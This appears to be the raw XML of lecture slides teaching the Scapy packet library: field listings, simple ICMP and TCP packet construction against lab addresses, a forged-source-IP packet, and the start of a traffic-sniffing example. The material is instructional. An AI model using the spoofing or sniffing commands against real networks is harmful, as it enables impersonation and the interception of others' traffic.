            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="717078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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function (cont.)</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100</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls(IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>version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(4 bits)                  = ('4')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ihl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(4 bits)                  = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tos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XByteField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          = ('0')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id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('1')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags      : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FlagsField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                          = ('&lt;Flag 0 ()&gt;')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frag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(13 bits)                 = ('0')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ttl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ByteField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                           = ('64')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto      : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ByteEnumField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                       = ('0')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chksum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XShortField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                         = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>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SourceIPField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                       = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>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DestIPField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                         = ('None')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>options    : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PacketListField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                     = ('[]')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326723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Constructing simple IP packet</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101</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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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"172.16.238.100"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ip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&lt;IP  </a:t>
            </a:r>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172.16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.238.100 |&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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ip.src</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"1.2.3.4"</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ip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&lt;IP  </a:t>
            </a:r>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.3.4 </a:t>
            </a:r>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172.16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.238.100 |&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19656646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Listing TCP fields using ls</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102</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls(TCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sport      : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShortEnumField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dport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ShortEnumField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'80'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seq        : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IntField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ack        : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IntField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dataofs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 bits)                  = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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reserved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bits)                  = (</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flags      : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FlagsField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'&lt;Flag 2 (S)&gt;'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window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'8192'</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chksum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XShortField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urgptr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options    : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TCPOptionsField</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"b''"</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69791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Creating a simple TCP/IP packet</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103</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="172.16.238.11")/TCP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=80)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;IP  frag=0 proto=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</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=172.16.238.11 |&lt;TCP  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=http |&gt;&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="827143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Packet Sending Functions</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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Chart, funnel chart&#10;&#10;Description automatically generated">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA019064-CC4F-41C4-BEB6-12AE0B898B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8088" y="2255871"/>
            <a:ext cx="5803912" cy="3836117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801C2DEE-9A24-4852-86CF-074841E55802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1199147" y="2255871"/>
            <a:ext cx="4985085" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: this function only sends packets at layer 3 of the OSI model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>sr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>srloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: these functions send/receive data in layer 3 of the OSI model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sendp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: this function only sends packet at layer 2 of the OSI model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>srp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>srp1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>srploop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>these functions send/receive data in layer 2 of the OSI model.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939591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Sending a simple ICMP packet</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105</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470331"/>
            <a:ext cx="937204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da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; send(IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"172.16.238.100"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)/ICMP())</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA84ED2D-DFA5-426D-91EE-29B4F7D8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095" y="3815345"/>
            <a:ext cx="11534274" cy="529095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19002771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Sending a simple TCP packet</a:t>
            </a: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106</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470331"/>
            <a:ext cx="937204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da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; send(IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"172.16.238.100"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)/TCP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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059113DD-F554-4855-8A1B-0F956DAF5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15" y="3328686"/>
            <a:ext cx="11101137" cy="416386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7466997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Sending a manipulated/forged packet:</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107</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470331"/>
            <a:ext cx="937204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send(IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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"172.16.238.11"</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"172.16.238.100"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)/TCP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dport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8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"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1C4CF994-84FD-4995-BC96-48DC3E780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673" y="3247454"/>
            <a:ext cx="10676021" cy="563774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22402226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Sniffing with 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Sniff packets (TCP port 80 and 21) for 30 seconds and save them into a PCAP file on disk:</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108</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470331"/>
            <a:ext cx="9372047"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scapy.all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sniff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wrpcap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packets = sniff(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
